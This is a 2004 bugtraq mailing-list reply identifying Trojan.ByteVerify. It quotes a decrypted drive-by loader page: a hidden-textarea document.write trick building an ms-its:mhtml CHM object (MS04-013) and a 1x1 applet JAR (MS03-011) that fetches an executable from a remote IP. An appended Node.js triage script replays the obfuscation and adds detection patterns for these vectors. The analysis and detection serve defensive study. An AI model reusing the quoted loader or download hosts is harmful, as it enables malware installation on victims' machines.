List: bugtraq
Subject: Re: Strange Java Loader (not so strange - Trojan.ByteVerify)
From: K-OTiK Security <Special-Alerts () k-otik ! com>
Date: 2004-12-30 20:55:34
Message-ID: 20041231015802.17957.qmail () www ! securityfocus ! com
In-Reply-To: <116798078.20041230073423@gmx.net>
> So far, does anyone know how to protect from this crap?
Update your Windows and your antivirus software!
This attack is known as "Trojan.ByteVerify". It exploits the "Internet Explorer/Outlook CHM File Processing Arbitrary Code Execution Vulnerability (MS04-013)" and the "Microsoft Virtual Machine remote code execution flaw (MS03-011)".
<Symantec>
When Trojan.ByteVerify is executed, it performs the following actions:
  - Escapes the sandbox restrictions, using Blackbox.class, by doing the following:
      - Declares a new PermissionDataSet with setFullyTrusted set to TRUE.
      - Creates a trusted PermissionSet.
      - Sets permission to PermissionSet by creating its own URLClassLoader class, derived from the VerifierBug.class.
      - Loads Beyond.class using the URLClassLoader from Blackbox.class.
      - Gains unrestricted rights on the local machine by invoking the .assertPermission method of the PolicyEngine class in Beyond.class.
    [...]
  - May attempt to retrieve dialer programs and install them on the infected computer. The dialer programs may attempt to connect the infected computer to pornographic Web sites.
Threat known as:
Exploit-ByteVerify [McAfee]
Trojan.ByteVerify [Symantec]
Exploit.Java.Bytverify [KAV]
JAVA_BYTVERIFY.A [Trend]
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com
>
> Hi People,
>
> before reading this,
> don't go on any of the sites
> unless you are sure ;)
>
> after decrypting some stuff, this is the source from:
> http://xxl-size.com/cogo.html
> -------------------------------------
> <iframe src="http://209.8.20.130/dl/adv346.php">
> <iframe src="http://www.awmcash.biz/adverts/14/1.htm">
> -------------------------------------
>
> this is the source from one of the iframes
> (http://209.8.20.130/dl/adv346.php):
> ----------------------------------------------------
> <html><head>
> </head><body>
> <textarea id="cxw" style="display:none;">
> <object data="${PR}" type="text/x-scriptlet"></object>
> </textarea>
>
> <script language="javascript">
> document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
> </script>
> <applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET></body></html>
> ----------------------------------------------------
>
> The jar archive loaderadv346.jar contains some Java classes
> which exploit the URLClassLoader bug (BlackBox.class).
> It overrides the sandbox and downloads a loadadv346.exe from:
> http://209.8.20.130/dl/loadadv346.exe
>
> This seems to be a dialer or something like this;
> it changes the hosts file and creates some spawn files.
> You can look for yourself, I included the file
> and the Java stuff; the loadadv is UPX'd.
>
> So far, does anyone know how to protect from this crap?
> You're welcome to send some solutions ;)
>
> cya, Stefan
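The loader page Stefan decrypted above combines two tricks: the `<object>` tag that carries the ms-its:mhtml: CHM URL (the MS04-013 vector) is hidden as text inside a display:none textarea and only assembled at runtime by `replace()`, so a naive grep of the page for "ms-its" inside an object tag finds nothing; and the Java side is a 1x1 applet pointing at the JAR with the BlackBox/VerifierBug classes (the MS03-011 vector). The following Node.js script is an added example, not part of the thread: it replays the textarea substitution offline to recover the tag the victim's browser would actually have written, and then flags the indicators a responder would look for. The sample HTML is reconstructed from the snippet quoted above (hosts and file names are the ones in the thread, nothing is fetched); the indicator list and pattern names are my own and deliberately narrow, not a general exploit-kit signature.

```javascript
// Added example: static triage of an IE-era "loader" page of the kind quoted in
// the thread. Sample input is constructed from the snippet in the thread; the
// indicator patterns below are assumptions of this example, not an AV signature.
const SAMPLE_LOADER_HTML = [
  '<html><head>',
  '</head><body>',
  '<textarea id="cxw" style="display:none;">',
  '<object data="${PR}" type="text/x-scriptlet"></object>',
  '</textarea>',
  '',
  '<script language="javascript">',
  "document.write(cxw.value.replace(/\\${PR}/g,'ms-its:mhtml:file://c:\\\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));",
  '</script>',
  '<applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET></body></html>',
].join('\n');

// Constructed control page: an ordinary visible applet and a real textarea.
const SAMPLE_BENIGN_HTML = [
  '<html><body>',
  '<applet width=300 height=200 archive=chess.jar code=Chess></applet>',
  '<textarea id="comment"></textarea>',
  '</body></html>',
].join('\n');

// Recover the template hidden in the <textarea> and the replacement value passed
// to String.prototype.replace(), then apply it the way the browser would.
// Only the replace(/\${TOKEN}/g, '...') shape used by this loader is handled.
function replayTemplateSubstitution(html) {
  const ta = html.match(/<textarea\b[^>]*>([\s\S]*?)<\/textarea>/i);
  const call = html.match(/\.replace\(\/\\\$\{(\w+)\}\/g\s*,\s*'((?:[^'\\]|\\.)*)'\)/);
  if (!ta || !call) return null;
  const token = call[1];
  // Undo JS single-quoted string escapes ('\\' -> '\') to get the runtime value.
  const value = call[2].replace(/\\(.)/g, '$1');
  const re = new RegExp('\\$\\{' + token + '\\}', 'g');
  // Function replacer so '$' sequences in the value are never interpreted.
  const rendered = ta[1].replace(re, () => value).trim();
  return { token, value, rendered };
}

// Indicators worth flagging in a page like this (names/patterns are this example's).
const INDICATORS = [
  { id: 'ms-its-mhtml-chm',
    why: 'ms-its:mhtml: URL pulling a remote .chm (CHM handling, MS04-013)',
    re: /ms-its:mhtml:[^"'\s]*\.chm::\//i },
  { id: 'x-scriptlet-object',
    why: '<object type="text/x-scriptlet"> running remote HTML as a scriptlet',
    re: /<object\b[^>]*type\s*=\s*["']?text\/x-scriptlet/i },
  { id: 'tiny-applet',
    why: '1x1 applet loading a JAR (Java VM vector, MS03-011)',
    re: /<applet\b[^>]*\bwidth\s*=\s*["']?1\b[^>]*\bheight\s*=\s*["']?1\b[^>]*\barchive\s*=/i },
  { id: 'hidden-textarea-template',
    why: 'display:none textarea used as a template for document.write',
    re: /<textarea\b[^>]*display\s*:\s*none[\s\S]*?<\/textarea>[\s\S]*?document\.write\(\s*\w+\.value\.replace/i },
];

// Scan the raw page plus the replayed output, and pull out the remote
// artifacts (URLs, JAR names) a responder would block or retro-hunt for.
function triageLoaderPage(html) {
  const replay = replayTemplateSubstitution(html);
  const haystack = replay ? html + '\n' + replay.rendered : html;
  const indicators = INDICATORS.filter(ind => ind.re.test(haystack)).map(ind => ind.id);
  const urls = new Set();
  for (const m of haystack.matchAll(/https?:\/\/[^\s"'<>!]+/gi)) urls.add(m[0]);
  const jars = new Set();
  for (const m of haystack.matchAll(/\barchive\s*=\s*["']?([^\s"'>]+\.jar)/gi)) jars.add(m[1]);
  return { indicators, rendered: replay ? replay.rendered : null, urls: [...urls], jars: [...jars] };
}

console.log(JSON.stringify(triageLoaderPage(SAMPLE_LOADER_HTML), null, 2));
console.log(JSON.stringify(triageLoaderPage(SAMPLE_BENIGN_HTML), null, 2));
```

Running it prints, for the loader page, the reconstructed `<object data="ms-its:mhtml:file://c:\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm" type="text/x-scriptlet">` tag, all four indicators, the remote CHM URL and the loader JAR name; for the control page it reports no indicators and only the benign JAR. The point of replaying the substitution rather than grepping the raw page is that the dangerous URL never appears inside an `<object>` tag in the source as served, only in the string handed to `replace()`.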